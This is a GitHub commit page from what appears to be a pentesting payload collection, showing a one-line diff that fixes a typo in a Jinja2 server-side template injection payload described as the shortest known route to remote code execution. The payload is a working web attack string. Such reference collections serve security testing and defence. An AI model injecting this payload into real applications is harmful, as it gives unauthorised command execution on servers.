Merge pull request swisskyrepo#643 from p0dalirius/patch-2

SSTI / jinja2 : Removed dot in lipsum.__globals__.["os"]
xuedipiaofei · May 9, 2023 · af4ade2 · af4ade2
2 parents 8d2c30e + b3f98ad
commit af4ade2
Showing 1 changed file with 1 addition and 1 deletion.
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
@@ -576,7 +576,7 @@ Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/
 With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
 
 ```python
-{{ lipsum.__globals__.["os"].popen('id').read() }}
+{{ lipsum.__globals__["os"].popen('id').read() }}
 ```
 
 Source: https://twitter.com/podalirius_/status/1655970628648697860